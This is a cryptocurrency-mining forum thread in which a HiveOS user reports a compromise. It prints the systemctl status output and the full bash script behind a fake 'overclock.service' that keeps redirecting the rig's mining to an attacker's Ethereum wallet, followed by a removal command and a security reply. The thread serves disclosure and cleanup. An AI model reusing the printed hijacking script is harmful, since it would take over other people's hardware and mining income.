More
referral
Increase your income with Hive. Invite your friends and earn real cryptocurrency!

HIVE MALWARE ...... started with or as "overclock.service"

Hi,
we are under attack from some idiot(s) using the bad hive security to start a service that changes the flight sheet every 30min…

I changed all passwords and also reinstalled hive with hiveflasher…

I found this just an hour ago so I don´t know if the script/attacker is reproducing itself over the network (previously reinstalled without LAN connection)…

attacker address → 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C

bad service → systemctl status overclock → /lib /systemd /system /overclock.service

/sys /fs /cgroup /unified /system.slice /overclock.service# systemctl status overclock
● overclock.service - Error
Loaded: loaded (/lib /systemd /system /overclock.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2022-01-15 23:13:27 CET; 5h 1min ago
Main PID: 19552 (bash)
Tasks: 57 (limit: 4286)
CGroup: /system.slice/overclock.service
├─ 580 SCREEN -dm -c /hive /etc /screenrc.miner bash
├─ 600 bash /hive /bin /miner-run gminer 1
├─ 628 bash /hive /bin /miner-run gminer 1
├─ 679 ./gminer --algo eth --server eu1.ethermine. org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1. ethermine. org --port 14444 --user
├─ 683 /hive /miners /gminer/ 2.74/ gminer --algo eth --server eu1.ethermine. org --port 4444 --user 0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME --pass x --server eu1.ethermine.
├─19552 /bin /bash /usr /bin /nvidia-conf
└─24859 sleep 10m

script used → /usr /bin /nvidia-conf

!/usr/bin/env bash
. /etc/environment
export $(cat /etc /environment | grep -vE ‘^$|^#’ | cut -d= -f1)
loop=2
while [ $loop -le 10 ]
do
if grep -q “0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C” “/hive-config/wallet.conf”; then
echo “ok”
else
sed -i -e"s/^MINER=./MINER=gminer/" /hive-config /rig.conf
sed -i -e"s/^MINER2=.
/MINER2=/" /hive-config /rig.conf
mv /hive-config /wallet.conf /hive-config /rig-config-example.txt
cat <>/hive-config /wallet.conf

FLIGHT SHEET “Hivepool-ETH-GMiner(Nvidia)”

Miner gminer

GMINER_ALGO=“eth”
GMINER_TEMPLATE=“0x5E746E6a349f18F5eC9722b21767fAc3a06b9f5C.WORKERNAME”
GMINER_HOST=“eu1.ethermine. org
eu1.ethermine. org”
GMINER_PORT=“4444
14444”
GMINER_PASS=“x”
GMINER_TLS=""
GMINER_ALGO2=""
GMINER_TEMPLATE2=""
GMINER_HOST2=""
GMINER_PORT2=""
GMINER_PASS2=""
GMINER_TLS2=""
GMINER_INTENSITY=""
GMINER_USER_CONFIG=’’
GMINER_VER=""

META=’{“gminer”:{“coin”:“ETH”}}’
EOF
dos2unix /hive-config /wallet.conf
dos2unix /hive-config /rig.conf
sleep 30m
/hive /bin /miner restart
fi
/hive /bin /miner start
sleep10m
echo loop restarting
done

I removed the script … let’s see what happens next -.-

has someone had the same problem?

regards

1 Like

No suspicious activity until now …

Here is my snippet to delete the service and as well the attackers “nvidia-conf”

systemctl stop overclock.service && rm -f /lib/systemd/system/overclock.service && rm -f /usr/bin/nvidia-conf

send this in hive-shell or with send command action

change your passwords with help of hive-security-guide…

1 Like

Speculating the rigs are assigned routable addresses vs. behind NAT non-routable addressing?

Appreciate you sharing the data. Thanks.

This topic was automatically closed 416 days after the last reply. New replies are no longer allowed.